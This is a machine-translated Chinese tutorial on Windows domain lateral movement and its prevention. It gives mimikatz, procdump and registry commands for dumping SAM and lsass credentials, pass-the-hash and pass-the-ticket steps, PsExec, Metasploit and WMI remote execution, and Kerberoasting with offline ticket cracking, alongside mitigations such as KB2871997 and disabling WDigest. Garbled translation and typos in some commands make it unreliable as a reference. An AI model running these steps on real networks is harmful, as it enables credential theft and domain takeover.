Intra domain lateral mobility is a technology widely used in Xia Za's intranet attacks , Especially in high-level persistent threats (Advanced Persistent Threats,APT in . An attacker can use this technology , Take the trapped system as a springboard , Access to other hosts in the domain , Expand the scope of assets （ Including documents in the springboard machine and stored credentials , And the database connected through the springboard machine 、 Domain controllers or other important assets ).
Through such attacks , An attacker may eventually gain access to the domain controller , Even complete control is based on Windows Operating system infrastructure and business-related key accounts . therefore , A strong password must be used to protect privileged users from lateral mobility attacks , So as to avoid the fall of other machines in the domain . It is recommended that the system administrator change the password regularly , This will invalidate the permissions obtained by the attacker .

Commonly used Windows Remote connection and related commands

1.IPC

IPC( Internet Process Connection) share “ name pipes ” Resources for , Is an open named pipeline for inter process communication .IPC You can get the corresponding permissions by verifying the user name and password , It is usually used when remotely managing the computer and viewing the shared resources of the computer .
adopt ipc$, You can establish a connection with the target machine . Use this connection , Not only can you access files on the target machine , Upload 、 Download operation You can also run other commands on the day marking machine , To get the directory structure of the target machine 、 User list and other information .

 Use ipc Connect 
	net use \\192.168.1.106\ipc$ "ning" /user:ning
	net use f: \\192.168.43.2\c$ "@nl1345834516" /user:"administrator"  ( You can put the other party's c The disk maps to its own z disc , And so on )
 View connections 
	net use
dir command 
	dir \\192.168.43.247\c$
tasklist command 
	tasklist /S 192.168.43.247 /U ning /P ning

 Look at the target time 
	net time \\192.168.1.102

copy  command 
	copy test.bat \\192.168.1.102\c$




 Set up tasks 	
	 The target host <=win server 2008
	at \\192.168.1.102 16:45 c:\test.bat

	 The target host >=win server 2012
	schtasks /create /s 192.168.43.247 /tn test /sc onstart /tr c:\test.bat /ru system /f
 Perform tasks 
	schtasks /run /s 192.168.43.247 /i /tn "test"


 Delete ipc$
	net use \\192.168.43.3\ipc$ /del /y

 ipc$ Utilization conditions of

(1） Open the 139、445 End
ipc$ It can realize remote login and access to the default shared resources , and 139 The opening of the port indicates NetBIOS Application of protocol . adopt 139、445 （Window 2000） port , It can realize the sharing of files / Printer access . therefore , In general ,ipc$ need 139、445 Port support .

(2） The administrator has enabled the default sharing
Default sharing is enabled by default to facilitate remote management by administrators , Including all logic disks （c$、d$、e$ etc. ） And system catalog winnt or windows(admin$). adopt ipc$, You can access these default shared directories .

Windows System hash value acquisition analysis and prevention

Windowus The operating system usually uses two methods to encrypt the user's plaintext password . In a domain environment , User information is stored in ntds.dit in , After encryption, it is a hash value .Widows The password in the operating system usually consists of two parts , Part of it is LMHash, The other part is NTLMHash. stay Windows Operating system ,Hash The structure of is usually as follows .

username:RID:LM-HASH:NT-HASH

LM Hash The full name of is “LAN Manager Hash", It's Microsoft to improve Windows The hash encryption algorithm used in the security side of the operating system , Its essence is DES encryption . Even though LM Hash Easier to crack , But to ensure the compatibility of the system ,Windows Just to LMHash Disabled ( from Windows Vista and WindowsSever 2008 Version start ,Windows The operating system is disabled by default LM Hash ).LM Hash Plaintext passwords are limited to 14 Within position , in other words , If you want to stop using LM Hash, Set the user's password to 14 More than one bit is enough . If LM Hash Disabled , An attacker crawls through LM Hash Usually it is “ab35454a3435451404046“( Express LMHash Is null or disabled ).

NTLMHash It is a hash adder algorithm designed by Microsoft to improve security and ensure compatibility ,NTLMHash Is based on MD4 Encryption algorithm for encryption . Personal version from Windows Vista in the future , Server version from Wndows Sever2003 in the future ,Windows The authentication mode of the operating system is NTLM Hash.
 

Single machine password capture and prevention

If you want to be in Windows Grab hash value or plaintext password in the operating system , Permission must be elevated to Sytem. Local user name 、 Hash values and other security verification information are stored in SAM In file .Isass.exe Processes are used to implement Windows Security policy ( Local security policy and login policy ). You can use tools to remove hash values and plaintext passwords from memory ls.exe A process or SAM Export from file .
stay Windows Operating system ,SAM The file is saved in C:\WindowslSystem32\config. The file is locked , Reproduction is not allowed . In the penetration test , Traditional methods can be used , Closing Windows After the operating system , Use PE Disk into file management environment , Direct copy SAM file , You can also use VSS And so on . The following is an analysis of common stand-alone password capture tools and methods , And give preventive suggestions .
 

1. obtain sam,system Export password hash offline

1. The target host has been administrated cmd perform ：
reg save hklm\sam sam.hive    # adopt reg Of save Option will set the... In the registry SAM,System Export file to local disk 
reg save hklm\system system.hive

2. Administrator permission open minikatz perform ：
lsadump::sam /sam:sam.hive /system:system.hive    # Document and mimikatz Put it in the same directory 

2. Use mimikatz Read the local data directly SAM file

1. take mimikatz Upload to the target machine after the kill free processing , Open in command line mimikatz
privilege::debug    # Increase authority 
token::elevate    #system jurisdiction 
lsadump::sam    # Read local SAM file , obtain NTML Hash

 or 
2.mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"   # Read hash value and inscription code online 

3. Use mimikatz Offline reading lsass.dmp file

1. Use Procdump export lsass.dmp file ( A tool officially released by Microsoft )
	procdump.exe -accepteula -ma lsass.exe lsass.dmp

2. Use mimikatz export lsass.dmp Password hash value in file 
 function mimikatz, take lsass.dmp File loading to mimikatz
	sekurlsa::minidump lsass.DMP    # notice Switch to MINIDUMP  Loading successful 
	sekurlsa::logonPasswords full    # Export password hash value 

Prevention methods for single machine password capture

Microsoft to prevent user passwords from being disclosed in clear text in memory , A supplement was issued KB2871997 Shut down the Wdigest function .
Windows Server 2012 And above versions are closed by default Wdigest, Make it impossible for attackers to obtain plaintext passwords from memory .Windows Server 2012 The following versions , If installed KB2871997, Attackers are also unable to obtain plaintext passwords .
In daily network maintenance , By looking at the registry key Wdigest, Can be judged Wdigest State of function . If the value of this item is 1, The next time the user logs in , Attackers can use tools to obtain plaintext passwords . You should ensure that the value of this item is 0, So that the user's plaintext password will not appear in memory .

KB2871997: Shut down the Wdigest function , The local account is no longer allowed to remotely access the computer system , But the default local administrator account Administrator This SID by 500 User exception for

  send hashcat Get password

hashcat -a 0 -m xx <hashfile> <zidian1> <zidian2>

• -a 0: Crack in dictionary mode .
• -m xx: Appoint <hashfile> Hash value type within .
• <hashfile>: Store multiple hash values in text , Waiting to be cracked .
• <zidian1> <zidian2>: Specifies the dictionary file .

  How to prevent attackers from grabbing plaintext passwords and hash values

1. Set up Active Diretory 2012 R2 Functional level

Windws Sever 2012R2 A new one called “ Protected users ” User group . Just put the users to be protected in this group , Attackers cannot use mimikaz And other tools grab plaintext passwords and hash values .

2. install KB2871997

KB2871997 Microsoft is used to solve PsExec or IPC Remote viewing (ipc$ ) Patch to the problem , It can make the local account no longer allowed to connect to the computer system remotely , But the default local administrator account Administrator This SID by 500 User exception for —— Even if Administrator Change of name , Of this account SID Still 500, Attackers can still use the horizontal attack method to gain control of other computers in the intranet . install KB2871997 after , You still need to disable the default Administrator account number , To protect against hash passing attacks .

In daily network maintenance , Can pass Windows update Make automatic updates , You can also visit Microsoft's official website to download patch files for repair .

3. Disable storing plaintext passwords in memory by modifying the registry

Microsoft is in Windows xp In the version, Tainan Jia has a name of WDigest The agreement . The agreement enables Windows Store the plaintext password in memory , To facilitate users to log in to the local computer .

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0     # Add a key value to the registry , Set it to 0, After the computer logs off ,windows Password plaintext will not be stored in memory .
 
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential    # Query whether the key value is added successfully 

defense mimikatz attack

mimikatz When fetching hash values or plaintext passwords, you need to use Debug jurisdiction ( because mimikatz Need and Isass Processes interact , without Debug jurisdiction ,mimikatz Will not be able to read lsass process ). therefore , When maintaining the network , Defensive measures can be taken against this . Will have Debug Local administrators with permissions from Administrators Delete... From group .
 

Analysis and prevention of hash delivery attack

Reference resources ： Introduction to the principle of passing hash attack - Baidu safe community

Hash value ： When a user needs to log in to a website , If the website saves users' passwords in clear text , that , Once there is a security flaw in the website , The clear text passwords of all users will be disclosed . thus , The concept of hash value arises . When the user sets the password , The web server will hash and encrypt the user's password ( Usually use MD5 Algorithm ). Hash encryption algorithm is generally one-way irreversible algorithm . When a user logs on to a web site , The password entered by the user will be hashed and encrypted first , Then compare with the hash value stored in the database , If they are identical, the verification is successful .

Mainstream Windows operating system , You usually use NTLM Hash Authenticate users who access resources . Early versions of Windows operating system , Then use LM Hash Verify the user password . however , When the password is greater than or equal to 15 When a , Can't use LMHash 了 . from Windows Vista and Windows Server 2008 Version start ,Windows The operating system is disabled by default LM Hash, Because in use NTLM Hash When authenticating , Do not use clear text passwords , Instead, the plaintext password is passed through the system API ( for example LsaLogonUser ) Convert to hash value . however , After the attacker obtains the password hash value , Hash passing attacks can still be used to simulate user authentication .

After the user name and password hash are known, hash transfer is performed ：

minikatz function ：
privilege::debug
sekurlsa::pth /user:Administrator /domain:testlab /ntlm:f478e94103927311912ff00846210a30   

# A... Will pop up cmd.exe
dir \\dc\c$

mimikatz After execution Will pop up a corresponding hash User rights cmd window
You can see eject Domain controlled cmd jurisdiction ( Using domain control to control the current user succeeded )

Must be installed on the target machine KB28711997, Before you can import AES-256 Key to move horizontally （Pass The Key)

In this experiment, we should pay attention to the following points .

•     dir Followed by the host name to be used , instead of IP Address , Otherwise, you will be prompted with the wrong user name or password .
•     except AES-256 secret key ,AES-128 Keys can also be used for hash passing .
•     Use AES The precondition for hash transfer of the key to the remote host is to install the key locally KB2871997.
•     If installed KB2871997, Still usable SID by 500 Of users NTLM Hash Hash passing .
•     If you want to use mimikaz Hash transfer function of , Local administrator privileges are required . This is from mimikatz The implementation mechanism of ( High privilege processes are required lsass.exe Execute permission of ).
   

to update KB2871997 The impact of the patch  

  Microsoft is in 2014 year 5 Month issued KB2871997. This patch prohibits connecting to remote computers with local administrator privileges , The consequence is : Remote computers cannot be used by local administrators PsExec, WMI, smbexec, schtasks, You can't access the file share of the remote host . In the actual test , to update KB2871997 after ,Administrator account number (SID by 500 ) exception —— Hash transfer can still be performed using the hash value of this account .
What is emphasized here is SID by 500 Account number . In some computers , Even if Administator Change of name , It won't affect SID Value . therefore , If the attacker uses SID by 500 To move your account horizontally , Would not have been K827197 Influence . This should be paid special attention to in actual network maintenance
 

Analysis and prevention of bill delivery attack

Domain infiltration - Ticket delivery attack （Pass the Ticket） - You know

Use kekeo Bill delivery

After the user name and hash are known, the ticket is transferred （ The process does not require administrator privileges ）

kekeo "tgt::ask /user:administrator /domain:testlab.com /ntlm:f478e94103927311912ff00846210a30"    # Generate a ticket file in the current directory 
kerberos::purse    # stay kekeo To clear the tickets in the current memory 
 or 
klist purge    #windows Clear ticket on the command line 
 
kerberos::ptt ....kirbi    # Use kekeo Import ticket file into memory , Import complete ,exit Introduction , Use dir Command to view the files of the remote host .

After importing, we will try to access the file contents of domain control remotely ：

How to prevent bill delivery attacks

• Use dir On command , Be sure to use the hostname . If you use IP Address , It will lead to mistakes .
• The default effective time of note file in memory is 10 Hours .
• The ticket can be delivered on the target machine without the permission of the local administrator .
• Through the above points , You can sort out the idea of defending against bill delivery attacks .

PsExec Use

PsExec yes SysInternals A powerful software in the suite . At first PsExec It is mainly used for mass production Windows Operation and maintenance of the host , The effect is especially good in the domain environment . however , Attackers are beginning to use PsExec, Connect to the target machine through the command line environment , Even control the target machine , Without using the remote desktop protocol ( RDP ) Perform graphical control , It reduces the possibility of malicious operations being discovered by the administrator ( because PsExec yes Windows Tools provided , So antivirus software puts it on the white list ).PsExec Can be in Windows Vista/NT 4.0/2000/XP/Server 2003/Server 2008/Server 2012/Server 2016( Include 64 Bit version ) Up operation .
PsExec.exe usage

 In establishment ipc Connect below , Create interactive shell
PsExec.exe -accepteula \l192.168.100.190 -s cmd.exe
    -accepteula:     First run PsExec A confirmation box will pop up , With this parameter, there will be no 
    -s:     With system Permission to run remote processes , To obtain a system Interactive of permissions shell, Do not use this parameter to get a      administrator Of shell

 It's not established ipc:
psexec \\192.168.100.190 -u administrator -p [email protected] cmd.exe

 Execute the command and echo ：
psexec \1192.168.100.190 -u administrator -p [email protected] cmd.exe /c "ipconfig"

In the use of PsExec when , The following points need to be noted

•      More remote system startup is required admin$ share ( On by default )
•     After connecting to the target system , You don't need to enter your account and password .
•     In the use of psexec When executing a remote command , Will create a... In the target system psexec service . After the command is executed ,psexec The service will be automatically deleted . Because a large number of logs will be generated when creating or deleting Services , When tracing the source of an attack, you can reverse the attack process through the log .
•     Use PsExec Directly available System Interactive of permissions Shell.
   

Metasploit Medium psexec modular

search psexec
use exploit/windows/smb/psexec 
show options
set RHOSTS 1.1.1.7
set SMBPass 123
set SMBUser administrator
run

Input “shell” command , To obtain a System The powers of the Shell

WMI Use

WMI Use
WMI The full name of is “ Windows Management Instrumentation". from Windows 98 Start ,Windows All systems support WMI.WMI It's a set of tools , Computer systems can be managed locally or remotely .
since PsExec After being strictly monitored in the intranet , More and more anti-virus vendors will PsExec Added to the blacklist , have access to WMI Move horizontally . Through penetration test, it is found that , In the use of wmi.exe When moving laterally ,Windows By default, the operating system will not WMI The operation of is recorded in the log . Because no log will be generated during this process , Therefore, it increases the cost of attack traceability for network administrators . For the attacker , The probability of being observed is reduced 、 The concealment and salvation have been improved .

wmic /node:1.1.1.10 /user:Administrator /password:123456Aa process call create "cmd.exe /c ipconfig >c:\ip.txt"    # Use the... Of the target system cmd.exe Execute a command , Save the execution results in C Plate 

 establish ipc after , Use type The command reads the execution result 
net use \\1.1.1.8\ipc$ "123456Aa" /user:Administrator
type \\1.1.1.8\C$\ip.txt

Next , Use wmic Remote execution command , Start in the remote system Windows Management Instrumentation service ( The target server needs to be open 135 port ,wmic The command will be executed in the remote system with administrator privileges ）. If the target server has a firewall turned on ,wmic You will not be able to connect .
Besides ,wmic No echo , Need to use ipc$ and type Command to read information . It should be noted that , If wmic Executing a malicious program , There will be no log .
impacket In the kit wmiexec

wmiexec.py administrator:[email protected]@1.1.1.10

SPN Application in domain environment

Windows The domain environment is based on Microsoft's active directory service , It disperses the physical location in the network system environment 、 Users from different departments are grouped , Centralize resources , Effectively allocate resource access control permissions in a fine-grained manner , It improves the security of network environment and the convenience of unified distribution and management of network resources . In the domain environment
A large number of applications running in contain a variety of resources , For rational grouping of resources 、 Classification and redistribution facilitate . Microsoft assigns different service principal names to each resource in the domain (Service Principal Name,SPN).

SPN scanning

Relevant concepts

In the use of Kerberos Protocol for authentication in the network , You must have a built-in account (NetworkService、 LocalSystem) Or register for the server under the user account SPN. For built-in accounts ,SPN Will automatically register . But Gago runs the service under the domain user account , You must register manually for the account you want to use SPN. Because every server in the domain environment needs to be in Kerberos The identity check-up service is in progress SPN, Therefore, the attacker will send query requests directly to the domain controller , Get the services they need SPN, So as to know the service resources they need to use on that machine .
Kerberos The identity verification is convenient SPN Associate the service instance with the service login account . If more than one service instance is installed on the computer in the domain , Then each instance must have its own SPN. If the client may use multiple names for authentication , Then a given service instance can have multiple SPN. for example ,SPN Always include the host name of the running service instance , therefore , A service instance can register one for each name or alias of its host SPN. according to Kerberos agreement , When you enter your account and password to log in to the active directory , The domain controller will verify the account and password . After the verification is passed , Key distribution center （KDC) Services such as bills will be authorized (TGT) Send to user （ As the user's identity credentials when accessing resources ）.

Here is an example . When users need to access MSSQL The service , The system will query the domain controller as the current user SPN by “MSSQL” The record of . To find the SPN After recording , The user will contact again KDC signal communication , take KDC Issued TGT Send as identity credentials to KDC, And will need to access SPN Send to KDC.KDC Authentication service in (AS) Yes TGT To decrypt . After confirmation , from TGT A run will access the SPN The bill of the corresponding service and the SPN The address of the corresponding service is sent to the user . This ticket enables users to access MSSQL service .
SPN The order is as follows

SPN = serviceclass "/" hostname [":"port"] ["/" servicename]
serviceclass: The name of the service component 
hostname: With “/” Separate from the name behind , It's computer FQDN Fully qualified domain name , With both computer name and domain name 
port: Divide by colons , The following content is the port number that the service listens to 
servicename: A string , It can be the proper name of the service （DN),objeectGuid,Internet Host name or fully qualified domain name 

common SPN service

MSSQL  The sample code for the service is as follows .
MSSQLSvc/ computer1.labtest.com:1433
MSSOLSvc:  The name of the service component , Here is  MSSQL  service .
computer computer1.labtest: The host name is computer1, The domain name is labtest
1433: The listening port is 1433.
serviceclass and  hostname Is a required parameter ,port and servicename Is an optional parameter ,hostname and port The colon between is only used when the service listens on its port .
 
 
Exchange The sample code for the service is as follows .
exchangeMDB/EXCAS01.labtest.com
 
RDP The sample code for the service is as follows .
TERMSERV/EXCAS01.labtest.com
 
WSMan/WinRM/PSRemoting  The sample code for the service is as follows .
WSMAN/EXCAS01.labtest.com

1. Use powershell The script goes on spn scanning

Script Download ：https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSMSSQLServers

 Find out all spn
Import-Module .\Discover-PSInterestingServices
Discover-PSInterestingServices

2. Use Windows The built-in tool lists all the in the domain SPN Information

setspn -T domain -q */*

 Kerberoast Attack analysis and prevention

Kerberoast It's a kind of needle Yes Kerberos Protocol attack mode . In order to use a particular resource TGS send out Kerberos Service ticket request , Users first need to use a with valid identity permissions TGT towards TGS Request the ticket for the corresponding service . When TGT When it is verified to be valid and has the permission of the service , A ticket will be sent to the user . This note is used in conjunction with SPN Of the associated computer service account NTLM Hash (RC4_HMAC_MD5), in other words , The attacker will pass Kerberoast Try using different NTLM Hash To open the Kerberos Notes . If the attacker uses NTLM Hash That's right. ,Kerbers The ticket will be opened , And the NTLM Hash The password corresponding to the computer service account .
In a domain environment , The attacker will pass Kerberast Use normal user permissions to extract the credentials of the computer service account in the active directory . Because when using this method , Most operations are done offline , No information will be sent to the target system , Therefore, it will not cause the alarm of safety equipment . And because the domain environment policy of most networks is not strict enough ( No password expiration time is set for the computer service account ; The permissions of the computer service account are too high ; The password of the computer service account is the same as that of the common domain user account ）, So the password of the computer service account is easy to be Kerberoast The impact of the attack .
 

1. experiment ： To configure MSSQL service , Crack the service ticket

(1) Manual registration SPN

Enter the following command , Manual as MSSQL Service account registration SPN

setspn -A MSSQLSvc/computer1.labtest.com:1433 mssql

(2) View the corresponding SPN

 View all registered SPN, The order is as follows .
setspn -T domain -q */*
 
 View the registered of the specified user SPN, The order is as follows .
setspn -L labtest.com\mssql

(3) Use adsiedit.msc To view the user SPN And other advanced properties

(4) Configure the login permission of the specified service

 Execute the following command , Configure the login permission of the specified service for the user in the active directory 
gpedit.msc\Computer Configuration\Windows Settings\Security Setting\Local Policies\Users Rights Assignment \Log on as a service

(5) Modify the encryption type
because Kerberos The default encryption method of the protocol is AES256_ HMAC, And by tgsrepcrack.py The encryption method cannot be cracked , therefore , The attacker will set the encryption method to... Through the server group policy RC4 HMAC_MD5, The order is as follows

gpedit.msc\Computer Configuration\Windows Settings\Security Setting\Local Policies\Security Options\Network security: Configure encryption types allowed for kerberos

(6) request SPN Kerberos Notes

 open Pwerhel Enter the following command 
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestor SecurityToken -ArgumentList "MSSQLSvc/computer1.labtest.com"

(7) Export bill

 stay mimikatz Execute the following command , Export the ticket in memory 
Kerberos::list /export    # The ticket will be exported to... In the current directory kirbi In file , The encryption method is RC4_HMAC_MD5

(8) Use Kerberoast Script offline cracking the account number corresponding to the bill NTLMHash

download Kerberoast Because the tool uses Python language-written , So you need to configure it locally Python2.7 Environmental Science .

take MSSQL Copy the ticket file corresponding to the service to KaliLinux in .
stay Kerberoest One of them is called gepeack.y Script file for , Its main function is to crack bills offline NTLM Hash stay Kai Linux Open the script in , Enter the following command in the command line environment

python tgsrepcrack.py wordlist.txt mssql.kirbi
 
 If it works , The password of the account corresponding to the bill will be printed on the screen .

 . Precautions

in the light of Kerberoast attack , There are the following precautions .

1. Ensure that the service account password is longer than 25 position ; Ensure the randomness of the password ; Regularly change the password of the service account .
2. If , No attacker will be able to default AES256_HMAC The encryption method is changed to RC4_HMAC_MD5, Can't use tgsrepcrack.py To crack the code .
3. Attackers can sniff and grab Kerberos TGS Notes . therefore , If forced to use AES_256_HMAC Way to Kerberos The bill is encrypted , that , Even if the attacker gets Kerberos Notes , You can't crack it , This ensures the security of the active directory .
4. Many service accounts have been assigned excessive permissions in the intranet , And the password strength is usually poor . The attacker is likely to crack the ticket's password , Upgrade from domain user privilege to domain administrator privilege . therefore , The permissions of the service account should be configured properly , And increase the strength of the password .
5. During log auditing , You can focus on ID by 4769 ( request Krbers Service ticket ) Events . If there are too many 4769 journal , You should further check the system for malicious behavior .